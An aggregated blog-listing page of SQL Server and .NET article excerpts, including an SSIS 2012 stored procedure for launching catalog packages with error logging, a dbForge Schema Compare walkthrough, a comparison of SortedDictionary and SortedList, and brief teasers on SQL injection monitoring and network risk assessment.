    I've been trying to find some decent tutorials on how to set up a recent release of Cherokee webserver on Ubuntu (or equivalent Linux distros) which outline how to setup the webserver, mysql, phpmyadmin and php. Some already exist, such as http://www.howtoforge.com/installing-cherokee-with-php5-and-mysql-support-on-ubuntu-10.04 however, I've found that the Cherokee version used in the tutorial is considerably out of date and the update process has been painful to say the least. Thanks.

    Read the article

  • Time to stop using &ldquo;Execute Package Task&rdquo;&ndash; a way to execute package in SSIS catalog taking advantage of the new project deployment model ,and the logging and reporting feature

    - by Kevin Shyr
    I set out to find a way to dynamically call package in SSIS 2012.  The following are 2 excellent blogs I found; I used them heavily.  The code below has some addition to parameter types and message types, but was made essentially derived entirely from the blogs. http://sqlblog.com/blogs/jamie_thomson/archive/2011/07/16/ssis-logging-in-denali.aspx http://www.ssistalk.com/2012/07/24/quick-tip-run-ssis-2012-packages-synchronously-and-other-execution-options/   The code: Every package will be called by a PackageController package.  The packageController is initialized with some information on which package to run and what information to pass in.   The following is the stored procedure called from the “Execute SQL Task”.  Here is the highlight of the stored procedure It takes in packageName, project name, and folder name (folder in SSIS project deployment to SSIS catalog) The stored procedure sets the package variables of the upcoming package execution Execute package in SSIS Catalog Get the status of the execution.  Also, if exists, get the error message’s message_id and store them in the management database. Return value to “Execute SQL Task” to manage failure properly CREATE PROCEDURE [AUDIT].[LaunchPackageExecutionInSSISCatalog]        @PackageName NVARCHAR(255)        , @ProjectFolder NVARCHAR(255)        , @ProjectName NVARCHAR(255)        , @AuditKey INT        , @DisableNotification BIT        , @PackageExecutionLogID INT AS BEGIN TRY        DECLARE @execution_id BIGINT = 0;        -- Create a package execution        EXEC [SSISDB].[catalog].[create_execution]                     @package_name=@PackageName,                     @execution_id=@execution_id OUTPUT,                     @folder_name=@ProjectFolder,                     @project_name=@ProjectName,                     @use32bitruntime=False;          UPDATE [AUDIT].[PackageInstanceExecutionLog] WITH(ROWLOCK)        SET [SSISCatalogExecutionID] = @execution_id        WHERE [PackageInstanceExecutionLogID] = @PackageExecutionLogID          -- this is to set the execution synchronized so that I can check the result in the end        EXEC [SSISDB].[catalog].[set_execution_parameter_value]                     @execution_id,                      @object_type=50,                     @parameter_name=N'SYNCHRONIZED',                     @parameter_value=1; -- true          /********************************************************         ********************************************************              Section: setting parameters                     Source table:  SSISDB.internal.object_parameters              object_type list:                     20: project level variables                     30: package level variables                     50: execution parameter         ********************************************************         ********************************************************/        EXEC [SSISDB].[catalog].[set_execution_parameter_value]                     @execution_id,                      @object_type=30,                     @parameter_name=N'FromParent_AuditKey',                     @parameter_value=@AuditKey; -- true          EXEC [SSISDB].[catalog].[set_execution_parameter_value]                     @execution_id,                      @object_type=30,                     @parameter_name=N'FromParent_DisableNotification',                     @parameter_value=@DisableNotification; -- true          EXEC [SSISDB].[catalog].[set_execution_parameter_value]                     @execution_id,                      @object_type=30,                     @parameter_name=N'FromParent_PackageInstanceExecutionID',                     @parameter_value=@PackageExecutionLogID; -- true        /********************************************************         ********************************************************              Section: setting variables END         ********************************************************         ********************************************************/            /* This section is carried over from example code           I don't see a reason to change them yet        */        -- Set our package parameters        EXEC [SSISDB].[catalog].[set_execution_parameter_value]                     @execution_id,                      @object_type=50,                     @parameter_name=N'DUMP_ON_EVENT',                     @parameter_value=1; -- true          EXEC [SSISDB].[catalog].[set_execution_parameter_value]                     @execution_id,                      @object_type=50,                     @parameter_name=N'DUMP_EVENT_CODE',                     @parameter_value=N'0x80040E4D;0x80004005';          EXEC [SSISDB].[catalog].[set_execution_parameter_value]                     @execution_id,                      @object_type=50,                     @parameter_name=N'LOGGING_LEVEL',                     @parameter_value= 1; -- Basic          EXEC [SSISDB].[catalog].[set_execution_parameter_value]                     @execution_id,                      @object_type=50,                     @parameter_name=N'DUMP_ON_ERROR',                     @parameter_value=1; -- true                              /********************************************************         ********************************************************              Section: EXECUTING         ********************************************************         ********************************************************/        EXEC [SSISDB].[catalog].[start_execution]                     @execution_id;        /********************************************************         ********************************************************              Section: EXECUTING END         ********************************************************         ********************************************************/            /********************************************************         ********************************************************              Section: checking execution result                     Source table:  [SSISDB].[catalog].[executions]              status:                     1: created                     2: running                     3: cancelled                     4: failed                     5: pending                     6: ended unexpectedly                     7: succeeded                     8: stopping                     9: completed         ********************************************************         ********************************************************/        if EXISTS(SELECT TOP 1 1                            FROM [SSISDB].[catalog].[executions] WITH(NOLOCK)                            WHERE [execution_id] = @execution_id                                  AND [status] NOT IN (2, 7, 9)) BEGIN                /********************************************************               ********************************************************                     Section: logging error messages                            Source table:  [SSISDB].[internal].[operation_messages]                     message type:                            10:  OnPreValidate                             20:  OnPostValidate                             30:  OnPreExecute                             40:  OnPostExecute                             60:  OnProgress                             70:  OnInformation                             90:  Diagnostic                             110:  OnWarning                            120:  OnError                            130:  Failure                            140:  DiagnosticEx                             200:  Custom events                             400:  OnPipeline                     message source type:                            10:  Messages logged by the entry APIs (e.g. T-SQL, CLR Stored procedures)                             20:  Messages logged by the external process used to run package (ISServerExec)                             30:  Messages logged by the package-level objects                             40:  Messages logged by tasks in the control flow                             50:  Messages logged by containers (For, ForEach, Sequence) in the control flow                             60:  Messages logged by the Data Flow Task                                    ********************************************************               ********************************************************/                INSERT INTO AUDIT.PackageInstanceExecutionOperationErrorLink                     SELECT @PackageExecutionLogID                                  ,[operation_message_id]                            FROM [SSISDB].[internal].[operation_messages] WITH(NOLOCK)                            WHERE operation_id = @execution_id                                  AND message_type IN (120, 130)                           EXEC [AUDIT].[FailPackageInstanceExecution] @PackageExecutionLogID, 'SSISDB Internal operation_messages found'                GOTO ReturnTrueAsErrorFlag                /********************************************************               ********************************************************                     Section: checking messages END               ********************************************************               ********************************************************/                /* This part is not really working, so now using rowcount to pass status              --DECLARE @PackageErrorMessage NVARCHAR(4000)              --SET @PackageErrorMessage = @PackageName + 'failed with executionID: ' + CONVERT(VARCHAR(20), @execution_id)                --RAISERROR (@PackageErrorMessage -- Message text.              --     , 18 -- Severity,              --     , 1 -- State,              --     , N'check table AUDIT.PackageInstanceExecutionErrorMessages' -- First argument.              --     );              */        END        ELSE BEGIN              GOTO ReturnFalseAsErrorFlagToSignalSuccess        END        /********************************************************         ********************************************************              Section: checking execution result END         ********************************************************         ********************************************************/ END TRY BEGIN CATCH        DECLARE @SSISCatalogCallError NVARCHAR(MAX)        SELECT @SSISCatalogCallError = ERROR_MESSAGE()          EXEC [AUDIT].[FailPackageInstanceExecution] @PackageExecutionLogID, @SSISCatalogCallError          GOTO ReturnTrueAsErrorFlag END CATCH;     /********************************************************  ********************************************************    Section: end result  ********************************************************  ********************************************************/ ReturnTrueAsErrorFlag:        SELECT CONVERT(BIT, 1) AS PackageExecutionErrorExists ReturnFalseAsErrorFlagToSignalSuccess:        SELECT CONVERT(BIT, 0) AS PackageExecutionErrorExists   GO

    Read the article

  • Survey: Do you write custom SQL CLR procedures/functions/etc

    - by James Luetkehoelter
    I'm quite curious because despite the great capabilities of writing CLR-based stored procedures to off-load those nasty operations TSQL isn't that great at (like iteration, or complex math), I'm continuing to see a wealth of SQL 2008 databases with complex stored procedures and functions which would make great candidates. The in-house skill to create the CLR code exists as well, but there is flat out resistance to use it. In one scenario I was told "Oh, iteration isn't a problem because we've trained...(read more)

    Read the article

  • SQL SERVER – How to Compare the Schema of Two Databases with Schema Compare

    - by Pinal Dave
    Earlier I wrote about An Efficiency Tool to Compare and Synchronize SQL Server Databases and it was very much well received. Since the blog post I have received quite a many question that just like data how we can also compare schema and synchronize it. If you think about comparing the schema manually, it is almost impossible to do so. Table Schema has been just one of the concept but if you really want the all the schema of the database (triggers, views, stored procedure and everything else) it is just impossible task. If you are developer or database administrator who works in the production environment than you know that there are so many different occasions when we have to compare schema of the database. Before deploying any changes to the production server, I personally like to make note of the every single schema change and document it so in case of any issue , I can always go back and refer my documentation. As discussed earlier it is absolutely impossible to do this task without the help of third party tools. I personally use Devart Schema Compare for this task. This is an extremely easy tool. Let us see how it works. First I have two different databases – a) AdventureWorks2012 and b) AdventureWorks2012-V1. There are total three changes between these databases. Here is the list of the same. One of the table has additional column One of the table have new index One of the stored procedure is changed Now let see how dbForge Schema Compare works in this scenario. First open dbForge Schema Compare studio. Click on New Schema Comparison. It will bring you to following screen where we have to configure the database needed to configure. I have selected AdventureWorks2012 and AdventureWorks-V1 databases. In the next screen we can verify various options but for this demonstration we will keep it as it is. We will not change anything in schema mapping screen as in our case it is not required but generically if you are comparing across schema you may need this. This is the most important screen as on this screen we select which kind of object we want to compare. You can see the options which are available to select. The screen lets you select the objects from SQL Server 2000 to SQL Server 2012. Once you click on compare in previous screen it will bring you to this screen, which will essentially display the comparative difference between two of the databases which we had selected in earlier screen. As mentioned above there are three different changes in the database and the same has been listed over here. Two of the changes belongs to the tables and one changes belong to the procedure. Let us click each of them one by one to see what is the difference between them. In very first option we can see that there is an additional column in another database which did not exist earlier. In this example we can see that AdventureWorks2012 database have an additional index. Following example is very interesting as in this case, we have changed the definition of the stored procedure and the result pan contains the same. dbForget Schema Compare very effectively identify the changes in schema and lists them neatly to developers. Here is one more screen. This software not only compares the schema but also provides the options to update or drop them as per the choice. I think this is brilliant option. Well, I have been using schema compare for quite a while and have found it very useful. Here are few of the things which dbForge Schema Compare can do for developers and DBAs. Compare and synchronize SQL Server database schemas Compare schemas of live database and SQL Server backup Generate comparison reports in Excel and HTML formats Eliminate mistakes in schema changes propagation across environments Track production database changes and customizations Automate migration of schema changes using command line interface I suggest that you try out dbForge Schema Compare and let me know what you think of this product. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: PostADay, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, SQL Utility, T SQL

    Read the article

  • SortedDictionary and SortedList

    - by Simon Cooper
    Apart from Dictionary<TKey, TValue>, there's two other dictionaries in the BCL - SortedDictionary<TKey, TValue> and SortedList<TKey, TValue>. On the face of it, these two classes do the same thing - provide an IDictionary<TKey, TValue> interface where the iterator returns the items sorted by the key. So what's the difference between them, and when should you use one rather than the other? (as in my previous post, I'll assume you have some basic algorithm & datastructure knowledge) SortedDictionary We'll first cover SortedDictionary. This is implemented as a special sort of binary tree called a red-black tree. Essentially, it's a binary tree that uses various constraints on how the nodes of the tree can be arranged to ensure the tree is always roughly balanced (for more gory algorithmical details, see the wikipedia link above). What I'm concerned about in this post is how the .NET SortedDictionary is actually implemented. In .NET 4, behind the scenes, the actual implementation of the tree is delegated to a SortedSet<KeyValuePair<TKey, TValue>>. One example tree might look like this: Each node in the above tree is stored as a separate SortedSet<T>.Node object (remember, in a SortedDictionary, T is instantiated to KeyValuePair<TKey, TValue>): class Node { public bool IsRed; public T Item; public SortedSet<T>.Node Left; public SortedSet<T>.Node Right; } The SortedSet only stores a reference to the root node; all the data in the tree is accessed by traversing the Left and Right node references until you reach the node you're looking for. Each individual node can be physically stored anywhere in memory; what's important is the relationship between the nodes. This is also why there is no constructor to SortedDictionary or SortedSet that takes an integer representing the capacity; there are no internal arrays that need to be created and resized. This may seen trivial, but it's an important distinction between SortedDictionary and SortedList that I'll cover later on. And that's pretty much it; it's a standard red-black tree. Plenty of webpages and datastructure books cover the algorithms behind the tree itself far better than I could. What's interesting is the comparions between SortedDictionary and SortedList, which I'll cover at the end. As a side point, SortedDictionary has existed in the BCL ever since .NET 2. That means that, all through .NET 2, 3, and 3.5, there has been a bona-fide sorted set class in the BCL (called TreeSet). However, it was internal, so it couldn't be used outside System.dll. Only in .NET 4 was this class exposed as SortedSet. SortedList Whereas SortedDictionary didn't use any backing arrays, SortedList does. It is implemented just as the name suggests; two arrays, one containing the keys, and one the values (I've just used random letters for the values): The items in the keys array are always guarenteed to be stored in sorted order, and the value corresponding to each key is stored in the same index as the key in the values array. In this example, the value for key item 5 is 'z', and for key item 8 is 'm'. Whenever an item is inserted or removed from the SortedList, a binary search is run on the keys array to find the correct index, then all the items in the arrays are shifted to accomodate the new or removed item. For example, if the key 3 was removed, a binary search would be run to find the array index the item was at, then everything above that index would be moved down by one: and then if the key/value pair {7, 'f'} was added, a binary search would be run on the keys to find the index to insert the new item, and everything above that index would be moved up to accomodate the new item: If another item was then added, both arrays would be resized (to a length of 10) before the new item was added to the arrays. As you can see, any insertions or removals in the middle of the list require a proportion of the array contents to be moved; an O(n) operation. However, if the insertion or removal is at the end of the array (ie the largest key), then it's only O(log n); the cost of the binary search to determine it does actually need to be added to the end (excluding the occasional O(n) cost of resizing the arrays to fit more items). As a side effect of using backing arrays, SortedList offers IList Keys and Values views that simply use the backing keys or values arrays, as well as various methods utilising the array index of stored items, which SortedDictionary does not (and cannot) offer. The Comparison So, when should you use one and not the other? Well, here's the important differences: Memory usage SortedDictionary and SortedList have got very different memory profiles. SortedDictionary... has a memory overhead of one object instance, a bool, and two references per item. On 64-bit systems, this adds up to ~40 bytes, not including the stored item and the reference to it from the Node object. stores the items in separate objects that can be spread all over the heap. This helps to keep memory fragmentation low, as the individual node objects can be allocated wherever there's a spare 60 bytes. In contrast, SortedList... has no additional overhead per item (only the reference to it in the array entries), however the backing arrays can be significantly larger than you need; every time the arrays are resized they double in size. That means that if you add 513 items to a SortedList, the backing arrays will each have a length of 1024. To conteract this, the TrimExcess method resizes the arrays back down to the actual size needed, or you can simply assign list.Capacity = list.Count. stores its items in a continuous block in memory. If the list stores thousands of items, this can cause significant problems with Large Object Heap memory fragmentation as the array resizes, which SortedDictionary doesn't have. Performance Operations on a SortedDictionary always have O(log n) performance, regardless of where in the collection you're adding or removing items. In contrast, SortedList has O(n) performance when you're altering the middle of the collection. If you're adding or removing from the end (ie the largest item), then performance is O(log n), same as SortedDictionary (in practice, it will likely be slightly faster, due to the array items all being in the same area in memory, also called locality of reference). So, when should you use one and not the other? As always with these sort of things, there are no hard-and-fast rules. But generally, if you: need to access items using their index within the collection are populating the dictionary all at once from sorted data aren't adding or removing keys once it's populated then use a SortedList. But if you: don't know how many items are going to be in the dictionary are populating the dictionary from random, unsorted data are adding & removing items randomly then use a SortedDictionary. The default (again, there's no definite rules on these sort of things!) should be to use SortedDictionary, unless there's a good reason to use SortedList, due to the bad performance of SortedList when altering the middle of the collection.

    Read the article

  • SQL SERVER – Weekly Series – Memory Lane – #050

    - by Pinal Dave
    Here is the list of selected articles of SQLAuthority.com across all these years. Instead of just listing all the articles I have selected a few of my most favorite articles and have listed them here with additional notes below it. Let me know which one of the following is your favorite article from memory lane. 2007 Executing Remote Stored Procedure – Calling Stored Procedure on Linked Server In this example we see two different methods of how to call Stored Procedures remotely.  Connection Property of SQL Server Management Studio SSMS A very simple example of the how to build connection properties for SQL Server with the help of SSMS. Sample Example of RANKING Functions – ROW_NUMBER, RANK, DENSE_RANK, NTILE SQL Server has a total of 4 ranking functions. Ranking functions return a ranking value for each row in a partition. All the ranking functions are non-deterministic. T-SQL Script to Add Clustered Primary Key Jr. DBA asked me three times in a day, how to create Clustered Primary Key. I gave him following sample example. That was the last time he asked “How to create Clustered Primary Key to table?” 2008 2008 – TRIM() Function – User Defined Function SQL Server does not have functions which can trim leading or trailing spaces of any string at the same time. SQL does have LTRIM() and RTRIM() which can trim leading and trailing spaces respectively. SQL Server 2008 also does not have TRIM() function. User can easily use LTRIM() and RTRIM() together and simulate TRIM() functionality. http://www.youtube.com/watch?v=1-hhApy6MHM 2009 Earlier I have written two different articles on the subject Remove Bookmark Lookup. This article is as part 3 of original article. Please read the first two articles here before continuing reading this article. Query Optimization – Remove Bookmark Lookup – Remove RID Lookup – Remove Key Lookup Query Optimization – Remove Bookmark Lookup – Remove RID Lookup – Remove Key Lookup – Part 2 Query Optimization – Remove Bookmark Lookup – Remove RID Lookup – Remove Key Lookup – Part 3 Interesting Observation – Query Hint – FORCE ORDER SQL Server never stops to amaze me. As regular readers of this blog already know that besides conducting corporate training, I work on large-scale projects on query optimizations and server tuning projects. In one of the recent projects, I have noticed that a Junior Database Developer used the query hint Force Order; when I asked for details, I found out that the basic concept was not properly understood by him. Queries Waiting for Memory Allocation to Execute In one of the recent projects, I was asked to create a report of queries that are waiting for memory allocation. The reason was that we were doubtful regarding whether the memory was sufficient for the application. The following query can be useful in similar cases. Queries that do not have to wait on a memory grant will not appear in the result set of following query. 2010 Quickest Way to Identify Blocking Query and Resolution – Dirty Solution As the title suggests, this is quite a dirty solution; it’s not as elegant as you expect. However, it works totally fine. Simple Explanation of Data Type Precedence While I was working on creating a question for SQL SERVER – SQL Quiz – The View, The Table and The Clustered Index Confusion, I had actually created yet another question along with this question. However, I felt that the one which is posted on the SQL Quiz is much better than this one because what makes that more challenging question is that it has a multiple answer. Encrypted Stored Procedure and Activity Monitor I recently had received questionable if any stored procedure is encrypted can we see its definition in Activity Monitor.Answer is - No. Let us do a quick test. Let us create following Stored Procedure and then launch the Activity Monitor and check the text. Indexed View always Use Index on Table A single table can have maximum 249 non clustered indexes and 1 clustered index. In SQL Server 2008, a single table can have maximum 999 non clustered indexes and 1 clustered index. It is widely believed that a table can have only 1 clustered index, and this belief is true. I have some questions for all of you. Let us assume that I am creating view from the table itself and then create a clustered index on it. In my view, I am selecting the complete table itself. 2011 Detecting Database Case Sensitive Property using fn_helpcollations() I received a question on how to determine the case sensitivity of the database. The quick answer to this is to identify the collation of the database and check the properties of the collation. I have previously written how one can identify database collation. Once you have figured out the collation of the database, you can put that in the WHERE condition of the following T-SQL and then check the case sensitivity from the description. Server Side Paging in SQL Server CE (Compact Edition) SQL Server Denali is coming up with new T-SQL of Paging. I have written about the same earlier.SQL SERVER – Server Side Paging in SQL Server Denali – A Better Alternative,  SQL SERVER – Server Side Paging in SQL Server Denali Performance Comparison, SQL SERVER – Server Side Paging in SQL Server Denali – Part2 What is very interesting is that SQL Server CE 4.0 have the same feature introduced. Here is the quick example of the same. To run the script in the example, you will have to do installWebmatrix 4.0 and download sample database. Once done you can run following script. Why I am Going to Attend PASS Summit Unite 2011 The four-day event will be marked by a lot of learning, sharing, and networking, which will help me increase both my knowledge and contacts. Every year, PASS Summit provides me a golden opportunity to build my network as well as to identify and meet potential customers or employees. 2012 Manage Help Settings – CTRL + ALT + F1 This is very interesting read as my daughter once accidently came across a screen in SQL Server Management Studio. It took me 2-3 minutes to figure out how she has created the same screen. Recover the Accidentally Renamed Table “I accidentally renamed table in my SSMS. I was scrolling very fast and I made mistakes. It was either because I double clicked or clicked on F2 (shortcut key for renaming). However, I have made the mistake and now I have no idea how to fix this. If you have renamed the table, I think you pretty much is out of luck. Here are few things which you can do which can give you an idea about what your table name can be if you are lucky. Identify Numbers of Non Clustered Index on Tables for Entire Database Here is the script which will give you numbers of non clustered indexes on any table in entire database. Identify Most Resource Intensive Queries – SQL in Sixty Seconds #029 – Video Here is the complete complete script which I have used in the SQL in Sixty Seconds Video. Thanks Harsh for important Tip in the comment. http://www.youtube.com/watch?v=3kDHC_Tjrns Advanced Data Quality Services with Melissa Data – Azure Data Market For the purposes of the review, I used a database I had in an Excel spreadsheet with name and address information. Upon a cursory inspection, there are miscellaneous problems with these records; some addresses are missing ZIP codes, others missing a city, and some records are slightly misspelled or have unparsed suites. With DQS, I can easily add a knowledge base to help standardize my values, such as for state abbreviations. But how do I know that my address is correct? Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: Memory Lane, PostADay, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, T SQL, Technology

    Read the article

  • Database Activity Monitoring Part 2 - SQL Injection Attacks

    If you think through the web sites you visit on a daily basis the chances are that you will need to login to verify who you are. In most cases your username would be stored in a relational database along with all the other registered users on that web site. Hopefully your password will be encrypted and not stored in plain text.

    Read the article

  • Network Security Risk Assessment

    - by Chandra Vennapoosa
    Information that is gathered everyday regarding client and business transactions are either stored on servers or on user computers. These stored information are considered important and sensitive in the company's interest and hence they need to be protected from network attacks and other unknown circumstances. Network administrator manage and protect the network through a series of passwords and data encryption. Topics First Step for Risk Assessment Identifying Essential Data/System/Hardware Identifying External Blocks Measuring the Risk to Your Enterprise Calculating the Assets Value The Liquid Financial Assets Value Getting Everything Together

    Read the article

  • Survey: Do you write custom SQL CLR procedures/functions/etc

    - by James Luetkehoelter
    I'm quite curious because despite the great capabilities of writing CLR-based stored procedures to off-load those nasty operations TSQL isn't that great at (like iteration, or complex math), I'm continuing to see a wealth of SQL 2008 databases with complex stored procedures and functions which would make great candidates. The in-house skill to create the CLR code exists as well, but there is flat out resistance to use it. In one scenario I was told "Oh, iteration isn't a problem because we've trained...(read more)

    Read the article

< Previous Page | 466 467 468 469 470 471 472 473 474 475 476 477  | Next Page >